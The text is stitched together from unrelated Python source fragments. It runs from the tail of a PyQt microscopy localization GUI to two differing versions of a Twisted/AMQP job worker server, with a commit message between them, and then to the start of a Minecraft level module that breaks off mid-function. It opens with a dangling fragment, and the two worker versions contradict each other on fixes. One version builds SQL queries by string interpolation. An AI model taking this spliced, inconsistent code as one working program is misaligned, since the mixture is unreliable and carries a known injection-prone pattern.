                                                                                                         box, mmlg)
            self.status_bar.showMessage(message)
            self.identifications = identifications
            self.ready_for_fit = True
            self.draw_frame()
            if fit_afterwards:
                self.fit()

    def fit(self):
        """Fit all identified spots on a worker thread.

        Requires a prior successful identification (ready_for_fit).
        """
        if self.movie is not None and self.ready_for_fit:
            self.status_bar.showMessage('Preparing fit...')
            parameters = self.parameters_dialog.get_camera_parameters()
            camera = parameters['Camera']
            sensor = localize.CONFIG['Cameras'][camera]['Sensor']
            camera_info = {'sensor': sensor}
            if sensor == 'EMCCD':
                em = parameters['Electron Multiplying']
                readmode = parameters['Readout Mode']
                # Pre-amp gain is 1-based in the UI, 0-based in the config.
                preamp = parameters['Pre-Amp Gain'] - 1
                camera_info['sensitivity'] = localize.CONFIG['Cameras'][camera]['Sensitivity'][em][readmode][preamp]
                if em:
                    camera_info['gain'] = parameters['EM Real Gain']
                else:
                    camera_info['gain'] = 1
            elif sensor == 'sCMOS':
                pass  # put calibration here
            excitation = parameters['Excitation Wavelength']
            camera_info['qe'] = localize.CONFIG['Cameras'][camera]['Quantum Efficiency'][excitation]
            self.fit_worker = FitWorker(self.movie, camera_info, self.identifications, self.parameters['Box Size'])
            self.fit_worker.progressMade.connect(self.on_fit_progress)
            self.fit_worker.finished.connect(self.on_fit_finished)
            self.fit_worker.start()

    def on_fit_progress(self, current, n_spots):
        """Show fit progress in the status bar."""
        message = 'Fitting spot {:,}/{:,}...'.format(current, n_spots)
        self.status_bar.showMessage(message)

    def on_fit_finished(self, locs):
        """Store fit results, redraw and auto-save next to the movie."""
        self.status_bar.showMessage('Fitted {:,} spots.'.format(len(locs)))
        self.locs = locs
        self.draw_frame()
        base, ext = os.path.splitext(self.movie_path)
        self.save_locs(base + '_locs.hdf5')

    def fit_in_view(self):
        """Scale the view so the whole frame is visible."""
        self.view.fitInView(self.scene.sceneRect(), QtCore.Qt.KeepAspectRatio)

    def zoom_in(self):
        self.view.scale(10 / 7, 10 / 7)

    def zoom_out(self):
        self.view.scale(7 / 10, 7 / 10)

    def save_locs(self, path):
        """Write localizations plus provenance metadata to an hdf5 file."""
        localize_info = self.last_identification_info.copy()
        localize_info['Generated by'] = 'Picasso Localize'
        info = self.info + [localize_info]
        io.save_locs(path, self.locs, info)

    def save_locs_dialog(self):
        """Ask for a target path (defaulting next to the movie) and save."""
        base, ext = os.path.splitext(self.movie_path)
        locs_path = base + '_locs.hdf5'
        path = QtGui.QFileDialog.getSaveFileName(self, 'Save localizations', locs_path, filter='*.hdf5')
        if path:
            self.save_locs(path)

    def localize(self):
        """Run identification followed immediately by fitting."""
        self.identify(fit_afterwards=True)
class IdentificationWorker(QtCore.QThread):
    """Background thread that runs asynchronous spot identification."""

    progressMade = QtCore.pyqtSignal(int, dict)
    finished = QtCore.pyqtSignal(dict, object, np.recarray, bool)

    def __init__(self, window, fit_afterwards):
        """Snapshot everything the thread needs from the main window."""
        super().__init__()
        self.window = window
        self.movie = window.movie
        self.roi = window.view.roi
        self.parameters = window.parameters
        self.fit_afterwards = fit_afterwards

    def run(self):
        """Poll the identification futures, emitting progress until done."""
        pending = localize.identify_async(self.movie, self.parameters, self.roi)
        remaining = pending
        while remaining:
            completed, remaining = wait(pending, 0.1)
            self.progressMade.emit(len(completed), self.parameters)
        per_frame_results = [future.result() for future in pending]
        identifications = np.hstack(per_frame_results).view(np.recarray)
        self.finished.emit(self.parameters, self.roi, identifications, self.fit_afterwards)
class FitWorker(QtCore.QThread):
    """Background thread that fits identified spots and reports progress."""

    progressMade = QtCore.pyqtSignal(int, int)
    finished = QtCore.pyqtSignal(np.recarray)

    def __init__(self, movie, camera_info, identifications, box):
        """Store the fit inputs for later use in run()."""
        super().__init__()
        self.movie = movie
        self.camera_info = camera_info
        self.identifications = identifications
        self.box = box

    def run(self):
        """Launch the asynchronous fit and poll it until completion."""
        fit_thread, fit_info = localize.fit_async(
            self.movie, self.camera_info, self.identifications, self.box)
        while fit_thread.is_alive():
            self.progressMade.emit(fit_info.current, fit_info.n_spots)
            time.sleep(0.1)
        fit_thread.join()  # just in case...
        localizations = localize.locs_from_fit_info(fit_info, self.identifications, self.box)
        self.finished.emit(localizations)
if __name__ == '__main__':
    app = QtGui.QApplication(sys.argv)
    window = Window()
    window.show()

    def excepthook(exc_type, exc_value, exc_traceback):
        """Report uncaught exceptions in a dialog and on stderr."""
        message = ''.join(traceback.format_exception(exc_type, exc_value, exc_traceback))
        # Bug fix: QMessageBox.critical is a static convenience that shows
        # the (modal) dialog itself and returns the clicked button code; the
        # previous code called exec_() on that return value, which raised.
        QtGui.QMessageBox.critical(window, 'An error occured', message)
        sys.__excepthook__(exc_type, exc_value, exc_traceback)
    sys.excepthook = excepthook

    sys.exit(app.exec_())
|
from .base import BaseServer, LOGGER
from ..resources2 import WorkerResource
from ..networkaddress import getNetworkAddress
from ..amqp import amqp as AMQP
from ..resources import InterfaceResource, ExposedResource
from MySQLdb.cursors import DictCursor
from twisted.internet import reactor, protocol, task
from twisted.enterprise import adbapi
from twisted.web import server
from twisted.protocols.memcache import MemCacheProtocol, DEFAULT_PORT
from twisted.internet.defer import Deferred, DeferredList, maybeDeferred, inlineCallbacks
from twisted.internet.threads import deferToThread
from uuid import UUID, uuid4
import pprint
import cPickle as pickle
PRETTYPRINTER = pprint.PrettyPrinter(indent=4)
class WorkerServer(BaseServer):
    """AMQP worker: consumes job UUIDs, resolves them to account data and
    executes the matching exposed plugin function.

    Job lookup is memcached first, falling back to MySQL (the result is
    cached back into memcached for 7 days). Execution is throttled to
    `simultaneous_jobs` concurrent jobs by a one-second LoopingCall.
    """

    public_ip = None
    local_ip = None
    network_information = {}
    simultaneous_jobs = 100
    doSomethingCallLater = None
    jobs_complete = 0
    # NOTE(review): class-level mutable queue, shared by all instances.
    # Fine for the apparent one-server-per-process use; the bound append is
    # cached for the hot dequeue path.
    job_queue = []
    job_queue_a = job_queue.append

    def __init__(self,
                 aws_access_key_id,
                 aws_secret_access_key,
                 aws_s3_http_cache_bucket=None,
                 aws_s3_storage_bucket=None,
                 mysql_username=None,
                 mysql_password=None,
                 mysql_host=None,
                 mysql_database=None,
                 amqp_host=None,
                 amqp_username=None,
                 amqp_password=None,
                 amqp_vhost=None,
                 amqp_queue=None,
                 amqp_exchange=None,
                 memcached_host=None,
                 resource_mapping=None,
                 amqp_port=5672,
                 amqp_prefetch_count=1000,
                 mysql_port=3306,
                 memcached_port=11211,
                 max_simultaneous_requests=100,
                 max_requests_per_host_per_second=0,
                 max_simultaneous_requests_per_host=0,
                 port=5005,
                 log_file='workerserver.log',
                 log_directory=None,
                 log_level="debug"):
        self.network_information["port"] = port
        # Create MySQL connection.
        self.mysql = adbapi.ConnectionPool(
            "MySQLdb",
            db=mysql_database,
            port=mysql_port,
            user=mysql_username,
            passwd=mysql_password,
            host=mysql_host,
            cp_reconnect=True,
            cursorclass=DictCursor)
        # Create Memcached client
        self.memcached_host = memcached_host
        self.memcached_port = memcached_port
        self.memc_ClientCreator = protocol.ClientCreator(
            reactor, MemCacheProtocol)
        # Resource Mappings
        self.resource_mapping = resource_mapping
        # HTTP interface
        resource = WorkerResource(self)
        self.site_port = reactor.listenTCP(port, server.Site(resource))
        # AMQP connection parameters (connection is made in _start).
        self.amqp_host = amqp_host
        self.amqp_vhost = amqp_vhost
        self.amqp_port = amqp_port
        self.amqp_username = amqp_username
        self.amqp_password = amqp_password
        self.amqp_queue = amqp_queue
        self.amqp_exchange = amqp_exchange
        self.amqp_prefetch_count = amqp_prefetch_count
        BaseServer.__init__(
            self,
            aws_access_key_id=aws_access_key_id,
            aws_secret_access_key=aws_secret_access_key,
            aws_s3_http_cache_bucket=aws_s3_http_cache_bucket,
            aws_s3_storage_bucket=aws_s3_storage_bucket,
            max_simultaneous_requests=max_simultaneous_requests,
            max_requests_per_host_per_second=max_requests_per_host_per_second,
            max_simultaneous_requests_per_host=max_simultaneous_requests_per_host,
            log_file=log_file,
            log_directory=log_directory,
            log_level=log_level)

    def start(self):
        """Schedule startup once the reactor is running."""
        reactor.callWhenRunning(self._start)
        return self.start_deferred

    @inlineCallbacks
    def _start(self):
        """Connect to memcached and the AMQP broker, then start consuming."""
        yield self.getNetworkAddress()
        # Create memcached client
        self.memc = yield self.memc_ClientCreator.connectTCP(
            self.memcached_host, self.memcached_port)
        LOGGER.info('Connecting to broker.')
        self.conn = yield AMQP.createClient(
            self.amqp_host,
            self.amqp_vhost,
            self.amqp_port)
        self.auth = yield self.conn.authenticate(
            self.amqp_username,
            self.amqp_password)
        self.chan = yield self.conn.channel(1)
        yield self.chan.channel_open()
        yield self.chan.basic_qos(prefetch_count=self.amqp_prefetch_count)
        # Create Queue
        yield self.chan.queue_declare(
            queue=self.amqp_queue,
            durable=False,
            exclusive=False,
            auto_delete=False)
        yield self.chan.queue_bind(
            queue=self.amqp_queue,
            exchange=self.amqp_exchange)
        d = self.chan.basic_consume(queue=self.amqp_queue,
                                    no_ack=False,
                                    consumer_tag="awspider_consumer")
        d.addCallback(self.dequeue)
        self.queue = yield self.conn.queue("awspider_consumer")
        yield BaseServer.start(self)
        # Drain the in-memory job queue once per second.
        self.jobsloop = task.LoopingCall(self.executeJobs)
        self.jobsloop.start(1)

    @inlineCallbacks
    def shutdown(self):
        """Cancel pending calls and close the AMQP channel and connection."""
        LOGGER.debug("Closing connection")
        if self.doSomethingCallLater is not None:
            try:
                self.doSomethingCallLater.cancel()
            except Exception:
                # Narrowed from a bare except: the delayed call may already
                # have fired or been cancelled.
                pass
        # Shut things down
        LOGGER.info('Closing broker connection')
        yield self.chan.channel_close()
        chan0 = yield self.conn.channel(0)
        yield chan0.connection_close()

    def dequeue(self, consumer=None):
        """Kick off the blocking dequeue loop in a worker thread."""
        deferToThread(self._dequeue)

    def _dequeue(self):
        d = self.queue.get()
        d.addCallback(self._dequeue2)
        d.addErrback(self.workerError)

    def _dequeue2(self, msg):
        """Resolve the raw AMQP message (a 16-byte UUID) into a job dict."""
        if msg:
            # Get the hex version of the UUID from byte string we were sent
            uuid = UUID(bytes=msg.content.body).hex
            d = self.getJob(uuid)
            d.addCallback(self._dequeue3, msg)
            d.addErrback(self.workerError)

    def _dequeue3(self, job, msg):
        """Attach the exposed function, ack the message and queue the job.

        Messages for unknown functions are acknowledged and dropped so they
        are not redelivered forever; the dequeue loop continues regardless.
        """
        if job:
            # Load custom function.
            if job['function_name'] not in self.functions:
                # Bug fix: previously the job was queued anyway without an
                # 'exposed_function' entry, making mapKwargs/executeJobs
                # raise KeyError and leaving the message unacknowledged.
                LOGGER.error("Could not find function %s." % job['function_name'])
                self.chan.basic_ack(delivery_tag=msg.delivery_tag)
            else:
                job['exposed_function'] = self.functions[job['function_name']]
                LOGGER.info('Pulled job off of AMQP queue')
                job['kwargs'] = self.mapKwargs(job)
                # Ack only once the job is fully prepared for execution.
                d = self.chan.basic_ack(delivery_tag=msg.delivery_tag)
                self.job_queue_a(job)
        self.dequeueCallLater = reactor.callLater(1, self._dequeue)

    def executeJobs(self):
        """Run queued jobs, keeping at most `simultaneous_jobs` active."""
        while len(self.job_queue) > 0 and len(self.active_jobs) < self.simultaneous_jobs:
            job = self.job_queue.pop(0)
            exposed_function = job["exposed_function"]
            kwargs = job["kwargs"]
            function_name = job["function_name"]
            uuid = job["uuid"]
            d = self.callExposedFunction(
                exposed_function["function"],
                kwargs,
                function_name,
                uuid=uuid)
            d.addCallback(self._executeJob2)
            d.addErrback(self.workerError)

    def _executeJob2(self, data):
        self.jobs_complete += 1
        LOGGER.info('Completed %d jobs' % self.jobs_complete)

    def workerError(self, error):
        LOGGER.error('Worker Error: %s' % str(error))

    def getJob(self, uuid):
        """Fetch the job for `uuid`, trying memcached before MySQL."""
        d = self.memc.get(uuid)
        d.addCallback(self._getJob, uuid)
        d.addErrback(self.workerError)
        return d

    def _getJob(self, account, uuid):
        # memcached's get() returns a (flags, value) tuple.
        job = account[1]
        if not job:
            LOGGER.debug('Could not find uuid in memcached: %s' % uuid)
            # Parameterized query (was vulnerable string interpolation).
            sql = "SELECT account_id, type FROM spider_service WHERE uuid = %s"
            d = self.mysql.runQuery(sql, (uuid,))
            d.addCallback(self._getAccountMySQL, uuid)
            d.addErrback(self.workerError)
            return d
        else:
            LOGGER.debug('Found uuid in memcached: %s' % uuid)
            return pickle.loads(job)

    def _getAccountMySQL(self, spider_info, uuid):
        """Load the service-specific account row for the job's account."""
        if spider_info:
            account_type = spider_info[0]['type'].split('/')[0]
            # The table name cannot be parameterized (it comes from our own
            # database); the account_id value is bound safely.
            sql = "SELECT * FROM content_%saccount WHERE account_id = %%s" % account_type
            d = self.mysql.runQuery(sql, (spider_info[0]['account_id'],))
            d.addCallback(self.createJob, spider_info, uuid)
            d.addErrback(self.workerError)
            return d
        LOGGER.critical('No spider_info given for uuid %s' % uuid)
        return None

    def createJob(self, account_info, spider_info, uuid):
        """Assemble a job dict and cache it in memcached."""
        job = {}
        account = account_info[0]
        function_name = spider_info[0]['type']
        # `in` replaces the long-deprecated dict.has_key().
        if self.resource_mapping and function_name in self.resource_mapping:
            LOGGER.info('Remapping resource %s to %s' % (function_name, self.resource_mapping[function_name]))
            function_name = self.resource_mapping[function_name]
        job['function_name'] = function_name
        job['reservation_cache'] = None
        job['uuid'] = uuid
        job['account'] = account
        # Save account info in memcached for up to 7 days
        d = self.memc.set(uuid, pickle.dumps(job), 60*60*24*7)
        d.addCallback(self._createJob, job)
        d.addErrback(self.workerError)
        return d

    def _createJob(self, memc, job):
        return job

    def mapKwargs(self, job):
        """Map DB account columns onto the exposed function's arguments."""
        kwargs = {}
        service_name = job['function_name'].split('/')[0]
        # remap some basic fields that differ from the plugin and the database
        if ('%s_user_id' % service_name) in job['account']:
            job['account']['user_id'] = job['account']['%s_user_id' % service_name]
            job['account']['username'] = job['account']['%s_user_id' % service_name]
        if 'session_key' in job['account']:
            job['account']['sk'] = job['account']['session_key']
        if 'secret' in job['account']:
            job['account']['token_secret'] = job['account']['secret']
        if 'key' in job['account']:
            job['account']['token_key'] = job['account']['key']
        for arg in job['exposed_function']['required_arguments']:
            if arg in job['account']:
                kwargs[arg] = job['account'][arg]
        for arg in job['exposed_function']['optional_arguments']:
            if arg in job['account']:
                kwargs[arg] = job['account'][arg]
        return kwargs

    def createReservation(self, function_name, **kwargs):
        """Execute `function_name` immediately under a fresh UUID."""
        uuid = uuid4().hex
        if not isinstance(function_name, str):
            # A callable was passed; look up its registered name.
            for key in self.functions:
                if self.functions[key]["function"] == function_name:
                    function_name = key
                    break
        if function_name not in self.functions:
            raise Exception("Function %s does not exist." % function_name)
        d = self.callExposedFunction(
            self.functions[function_name]["function"],
            kwargs,
            function_name,
            uuid=uuid)
        d.addCallback(self._createReservationCallback, function_name, uuid)
        d.addErrback(self._createReservationErrback, function_name, uuid)
        return d

    def _createReservationCallback(self, data, function_name, uuid):
        return data

    def _createReservationErrback(self, error, function_name, uuid):
        LOGGER.error("Unable to create reservation for %s:%s, %s.\n" % (function_name, uuid, error))
        return {}

    def getNetworkAddress(self):
        """Detect public/local IPs and store them in network_information."""
        d = getNetworkAddress()
        d.addCallback(self._getNetworkAddressCallback)
        d.addErrback(self._getNetworkAddressErrback)
        return d

    def _getNetworkAddressCallback(self, data):
        if "public_ip" in data:
            self.public_ip = data["public_ip"]
            self.network_information["public_ip"] = self.public_ip
        if "local_ip" in data:
            self.local_ip = data["local_ip"]
            self.network_information["local_ip"] = self.local_ip

    def _getNetworkAddressErrback(self, error):
        message = "Could not get network address."
        LOGGER.error(message)
        raise Exception(message)
More speed improvements and AMQP ack changes: acknowledge a message only if we successfully processed its job.
from .base import BaseServer, LOGGER
from ..resources2 import WorkerResource
from ..networkaddress import getNetworkAddress
from ..amqp import amqp as AMQP
from ..resources import InterfaceResource, ExposedResource
from MySQLdb.cursors import DictCursor
from twisted.internet import reactor, protocol, task
from twisted.enterprise import adbapi
from twisted.web import server
from twisted.protocols.memcache import MemCacheProtocol, DEFAULT_PORT
from twisted.internet.defer import Deferred, DeferredList, maybeDeferred, inlineCallbacks
from twisted.internet.threads import deferToThread
from uuid import UUID, uuid4
import pprint
import cPickle as pickle
# Shared pretty-printer for debug dumps of complex job/config structures.
PRETTYPRINTER = pprint.PrettyPrinter(indent=4)
class WorkerServer(BaseServer):
    """An AMQP-driven job worker.

    Consumes job UUIDs from an AMQP queue, hydrates each job from
    memcached (falling back to MySQL), runs the mapped plugin function
    via callExposedFunction, and acks the AMQP delivery only after the
    job has been processed.
    """
    public_ip = None
    local_ip = None
    # Shared host/port info; populated by _getNetworkAddressCallback.
    network_information = {}
    # Upper bound on concurrently executing jobs (see executeJobs).
    simultaneous_jobs = 100
    doSomethingCallLater = None
    jobs_complete = 0
    # NOTE(review): class-level mutable, shared across instances; fine for
    # the intended one-server-per-process usage.
    job_queue = []
    # Pre-bound append used on the hot dequeue path.
    job_queue_a = job_queue.append
    def __init__(self,
            aws_access_key_id,
            aws_secret_access_key,
            aws_s3_http_cache_bucket=None,
            aws_s3_storage_bucket=None,
            mysql_username=None,
            mysql_password=None,
            mysql_host=None,
            mysql_database=None,
            amqp_host=None,
            amqp_username=None,
            amqp_password=None,
            amqp_vhost=None,
            amqp_queue=None,
            amqp_exchange=None,
            memcached_host=None,
            resource_mapping=None,
            amqp_port=5672,
            amqp_prefetch_count=1000,
            mysql_port=3306,
            memcached_port=11211,
            max_simultaneous_requests=100,
            max_requests_per_host_per_second=0,
            max_simultaneous_requests_per_host=0,
            port=5005,
            log_file='workerserver.log',
            log_directory=None,
            log_level="debug"):
        """Wire up MySQL, memcached, the HTTP interface and the AMQP
        parameters, then hand the rest of setup to BaseServer."""
        self.network_information["port"] = port
        # Create MySQL connection.
        self.mysql = adbapi.ConnectionPool(
            "MySQLdb",
            db=mysql_database,
            port=mysql_port,
            user=mysql_username,
            passwd=mysql_password,
            host=mysql_host,
            cp_reconnect=True,
            cursorclass=DictCursor)
        # Create Memcached client
        self.memcached_host = memcached_host
        self.memcached_port = memcached_port
        self.memc_ClientCreator = protocol.ClientCreator(
            reactor, MemCacheProtocol)
        # Resource Mappings
        self.resource_mapping = resource_mapping
        # HTTP interface
        resource = WorkerResource(self)
        self.site_port = reactor.listenTCP(port, server.Site(resource))
        # Create AMQP Connection
        # AMQP connection parameters
        self.amqp_host = amqp_host
        self.amqp_vhost = amqp_vhost
        self.amqp_port = amqp_port
        self.amqp_username = amqp_username
        self.amqp_password = amqp_password
        self.amqp_queue = amqp_queue
        self.amqp_exchange = amqp_exchange
        self.amqp_prefetch_count = amqp_prefetch_count
        BaseServer.__init__(
            self,
            aws_access_key_id=aws_access_key_id,
            aws_secret_access_key=aws_secret_access_key,
            aws_s3_http_cache_bucket=aws_s3_http_cache_bucket,
            aws_s3_storage_bucket=aws_s3_storage_bucket,
            max_simultaneous_requests=max_simultaneous_requests,
            max_requests_per_host_per_second=max_requests_per_host_per_second,
            max_simultaneous_requests_per_host=max_simultaneous_requests_per_host,
            log_file=log_file,
            log_directory=log_directory,
            log_level=log_level)
    def start(self):
        """Schedule _start once the reactor runs; returns the deferred
        that fires when startup completes."""
        reactor.callWhenRunning(self._start)
        return self.start_deferred
    @inlineCallbacks
    def _start(self):
        """Asynchronous startup: resolve network addresses, connect to
        memcached and AMQP, bind the queue, and begin consuming."""
        yield self.getNetworkAddress()
        # Create memcached client
        self.memc = yield self.memc_ClientCreator.connectTCP(self.memcached_host, self.memcached_port)
        LOGGER.info('Connecting to broker.')
        self.conn = yield AMQP.createClient(
            self.amqp_host,
            self.amqp_vhost,
            self.amqp_port)
        self.auth = yield self.conn.authenticate(
            self.amqp_username,
            self.amqp_password)
        self.chan = yield self.conn.channel(1)
        yield self.chan.channel_open()
        # Caps unacked deliveries; pairs with the manual acks in
        # _executeJob2 / _getAccountMySQL (no_ack=False below).
        yield self.chan.basic_qos(prefetch_count=self.amqp_prefetch_count)
        # Create Queue
        yield self.chan.queue_declare(
            queue=self.amqp_queue,
            durable=False,
            exclusive=False,
            auto_delete=False)
        yield self.chan.queue_bind(
            queue=self.amqp_queue,
            exchange=self.amqp_exchange)
        d = self.chan.basic_consume(queue=self.amqp_queue,
            no_ack=False,
            consumer_tag="awspider_consumer")
        d.addCallback(self.dequeue)
        self.queue = yield self.conn.queue("awspider_consumer")
        yield BaseServer.start(self)
        # Drain the local job queue once per second.
        self.jobsloop = task.LoopingCall(self.executeJobs)
        self.jobsloop.start(1)
    @inlineCallbacks
    def shutdown(self):
        """Cancel pending work and close the AMQP channel and connection."""
        # NOTE(review): "Closting" is a typo in this log message.
        LOGGER.debug("Closting connection")
        try:
            self.doSomethingCallLater.cancel()
        except:
            # Best effort: the delayed call may be absent or already fired.
            pass
        # Shut things down
        LOGGER.info('Closing broker connection')
        yield self.chan.channel_close()
        chan0 = yield self.conn.channel(0)
        yield chan0.connection_close()
    def dequeue(self, consumer=None):
        """basic_consume callback: start dequeuing in a worker thread.
        *consumer* (the consume reply) is unused."""
        LOGGER.info('Starting Dequeuing Thread...')
        deferToThread(self._dequeue)
    def _dequeue(self):
        """Pull the next message unless already at the prefetch limit,
        in which case poll again in one second.
        NOTE(review): first invoked from a thread via deferToThread --
        assumes queue.get()/callLater use here is safe; confirm."""
        if len(self.active_jobs) <= self.amqp_prefetch_count:
            d = self.queue.get()
            d.addCallback(self._dequeue2)
            d.addErrback(self.workerError)
        else:
            reactor.callLater(1, self._dequeue)
    def _dequeue2(self, msg):
        """Decode the 16-byte UUID payload and look the job up."""
        # Get the hex version of the UUID from byte string we were sent
        uuid = UUID(bytes=msg.content.body).hex
        d = self.getJob(uuid, msg.delivery_tag)
        d.addCallback(self._dequeue3, msg)
        d.addErrback(self.workerError)
    def _dequeue3(self, job, msg):
        """Attach function metadata and kwargs, queue the job locally,
        then immediately go back for the next message."""
        if job:
            # Load custom function.
            if job['function_name'] in self.functions:
                job['exposed_function'] = self.functions[job['function_name']]
            else:
                # NOTE(review): only logs -- executeJobs will later raise a
                # KeyError on 'exposed_function' for such a job.
                LOGGER.error("Could not find function %s." % job['function_name'])
            LOGGER.info('Pulled job off of AMQP queue')
            job['kwargs'] = self.mapKwargs(job)
            job['delivery_tag'] = msg.delivery_tag
            self.job_queue_a(job)
        self._dequeue()
    def executeJobs(self):
        """LoopingCall body: launch queued jobs while below the
        simultaneous_jobs ceiling."""
        while len(self.job_queue) > 0 and len(self.active_jobs) < self.simultaneous_jobs:
            job = self.job_queue.pop(0)
            exposed_function = job["exposed_function"]
            kwargs = job["kwargs"]
            function_name = job["function_name"]
            uuid = job["uuid"]
            d = self.callExposedFunction(
                exposed_function["function"],
                kwargs,
                function_name,
                uuid=uuid)
            d.addCallback(self._executeJob2, job)
            d.addErrback(self.workerError)
    def _executeJob2(self, data, job):
        """Ack the AMQP delivery only after the job ran successfully."""
        self.chan.basic_ack(delivery_tag=job['delivery_tag'])
        self.jobs_complete += 1
        LOGGER.info('Completed %d jobs' % self.jobs_complete)
    def workerError(self, error):
        """Generic errback: log and swallow the failure."""
        LOGGER.error('Worker Error: %s' % str(error))
    def getJob(self, uuid, delivery_tag):
        """Fetch the cached job for *uuid* from memcached."""
        d = self.memc.get(uuid)
        d.addCallback(self._getJob, uuid, delivery_tag)
        d.addErrback(self.workerError)
        return d
    def _getJob(self, account, uuid, delivery_tag):
        """Unpickle a memcached hit, or fall back to MySQL on a miss.
        memcached get() results arrive as a (flags, value) pair."""
        job = account[1]
        if not job:
            LOGGER.debug('Could not find uuid in memcached: %s' % uuid)
            # NOTE(review): uuid is interpolated into SQL directly; it comes
            # from UUID(...).hex upstream (hex characters only), but a
            # parameterized query would still be safer.
            sql = "SELECT account_id, type FROM spider_service WHERE uuid = '%s'" % uuid
            d = self.mysql.runQuery(sql)
            d.addCallback(self._getAccountMySQL, uuid, delivery_tag)
            d.addErrback(self.workerError)
            return d
        else:
            LOGGER.debug('Found uuid in memcached: %s' % uuid)
            return pickle.loads(job)
    def _getAccountMySQL(self, spider_info, uuid, delivery_tag):
        """Load the service account row for the job; ack and drop the
        message when the uuid is unknown so it is not redelivered."""
        if spider_info:
            account_type = spider_info[0]['type'].split('/')[0]
            sql = "SELECT * FROM content_%saccount WHERE account_id = %d" % (account_type, spider_info[0]['account_id'])
            d = self.mysql.runQuery(sql)
            d.addCallback(self.createJob, spider_info, uuid)
            d.addErrback(self.workerError)
            return d
        LOGGER.critical('No spider_info given for uuid %s' % uuid)
        self.chan.basic_ack(delivery_tag=delivery_tag)
        return None
    def createJob(self, account_info, spider_info, uuid):
        """Assemble the job dict and cache it in memcached for 7 days."""
        job = {}
        account = account_info[0]
        function_name = spider_info[0]['type']
        if self.resource_mapping and self.resource_mapping.has_key(function_name):
            LOGGER.info('Remapping resource %s to %s' % (function_name, self.resource_mapping[function_name]))
            function_name = self.resource_mapping[function_name]
        job['function_name'] = function_name
        job['reservation_cache'] = None
        job['uuid'] = uuid
        job['account'] = account
        # Save account info in memcached for up to 7 days
        d = self.memc.set(uuid, pickle.dumps(job), 60*60*24*7)
        d.addCallback(self._createJob, job)
        d.addErrback(self.workerError)
        return d
    def _createJob(self, memc, job):
        """Pass the job through after the memcached set completes."""
        return job
    def mapKwargs(self, job):
        """Derive plugin kwargs from the account row, translating a few
        database column names to the names the plugins expect."""
        kwargs = {}
        service_name = job['function_name'].split('/')[0]
        # remap some basic fields that differ from the plugin and the database
        if ('%s_user_id' % service_name) in job['account']:
            job['account']['user_id'] = job['account']['%s_user_id' % service_name]
            job['account']['username'] = job['account']['%s_user_id' % service_name]
        if 'session_key' in job['account']:
            job['account']['sk'] = job['account']['session_key']
        if 'secret' in job['account']:
            job['account']['token_secret'] = job['account']['secret']
        if 'key' in job['account']:
            job['account']['token_key'] = job['account']['key']
        for arg in job['exposed_function']['required_arguments']:
            if arg in job['account']:
                kwargs[arg] = job['account'][arg]
        for arg in job['exposed_function']['optional_arguments']:
            if arg in job['account']:
                kwargs[arg] = job['account'][arg]
        return kwargs
    def createReservation(self, function_name, **kwargs):
        """Run an exposed function once under a fresh UUID; accepts the
        registered name or the function object itself."""
        uuid = uuid4().hex
        if not isinstance(function_name, str):
            for key in self.functions:
                if self.functions[key]["function"] == function_name:
                    function_name = key
                    break
        if function_name not in self.functions:
            raise Exception("Function %s does not exist." % function_name)
        d = self.callExposedFunction(
            self.functions[function_name]["function"],
            kwargs,
            function_name,
            uuid=uuid)
        d.addCallback(self._createReservationCallback, function_name, uuid)
        d.addErrback(self._createReservationErrback, function_name, uuid)
        return d
    def _createReservationCallback(self, data, function_name, uuid):
        """Pass the reservation result through unchanged."""
        return data
    def _createReservationErrback(self, error, function_name, uuid):
        """Log a failed reservation and substitute an empty result."""
        LOGGER.error("Unable to create reservation for %s:%s, %s.\n" % (function_name, uuid, error))
        return {}
    def getNetworkAddress(self):
        """Look up public/local IPs via the module-level helper of the
        same name (shadowed by this method; the global is resolved here)."""
        d = getNetworkAddress()
        d.addCallback(self._getNetworkAddressCallback)
        d.addErrback(self._getNetworkAddressErrback)
        return d
    def _getNetworkAddressCallback(self, data):
        """Record whichever addresses the lookup produced."""
        if "public_ip" in data:
            self.public_ip = data["public_ip"]
            self.network_information["public_ip"] = self.public_ip
        if "local_ip" in data:
            self.local_ip = data["local_ip"]
            self.network_information["local_ip"] = self.local_ip
    def _getNetworkAddressErrback(self, error):
        """Startup cannot proceed without a network address: log and raise."""
        message = "Could not get network address."
        LOGGER.error(message)
        raise Exception(message)
'''
Created on Jul 22, 2011
@author: Rio
'''
from mclevelbase import *
from collections import deque;
import time
import zlib
import struct
import shutil
import subprocess
import sys
import urllib
import tempfile
from os.path import join, dirname, basename
log = logging.getLogger(__name__)
# Short module-level aliases so code below can call info()/debug() directly.
warn, error, info, debug = log.warn, log.error, log.info, log.debug
#infinite
# NBT tag-name constants for the Alpha/Infdev level format; named
# constants guard against typo-prone string literals at every tag access.
Level = 'Level'
BlockData = 'BlockData'
BlockLight = 'BlockLight'
SkyLight = 'SkyLight'
HeightMap = 'HeightMap'
TerrainPopulated = 'TerrainPopulated'
LastUpdate = 'LastUpdate'
xPos = 'xPos'
zPos = 'zPos'
Data = 'Data'
SpawnX = 'SpawnX'
SpawnY = 'SpawnY'
SpawnZ = 'SpawnZ'
LastPlayed = 'LastPlayed'
RandomSeed = 'RandomSeed'
SizeOnDisk = 'SizeOnDisk' #maybe update this?
Time = 'Time'
Player = 'Player'
# Public API of this module.
__all__ = ["ZeroChunk", "InfdevChunk", "ChunkedLevelMixin", "MCInfdevOldLevel", "MCAlphaDimension", "ZipSchematic"]
import re
def convert(text):
    """Return *text* as an int if it is purely digits, else unchanged."""
    return int(text) if text.isdigit() else text
def alphanum_key(key):
    """Split *key* into alternating text/number chunks so version-like
    strings compare naturally (e.g. "1.9" sorts before "1.10")."""
    return [convert(c) for c in re.split('([0-9]+)', key)]
def sort_nicely(l):
    """ Sort the given list in the way that humans expect.
    """
    # PEP 8 (E731): these were lambda assignments; plain defs give the
    # callables real names in tracebacks without changing behavior.
    l.sort(key=alphanum_key)
# Thank you, Stackoverflow
# http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
def which(program):
    """Locate *program* the way a shell would.

    A *program* containing a directory component is checked directly;
    otherwise %SYSTEMROOT% (Windows only) and every PATH entry are
    searched.  Returns the full path to an executable file, or None.
    """
    def _runnable(candidate):
        # Executable == exists and carries the execute bit for this user.
        return os.path.exists(candidate) and os.access(candidate, os.X_OK)
    directory, _basename = os.path.split(program)
    if directory:
        return program if _runnable(program) else None
    if sys.platform == "win32" and "SYSTEMROOT" in os.environ:
        candidate = os.path.join(os.environ["SYSTEMROOT"], program)
        if _runnable(candidate):
            return candidate
    if "PATH" in os.environ:
        for entry in os.environ["PATH"].split(os.pathsep):
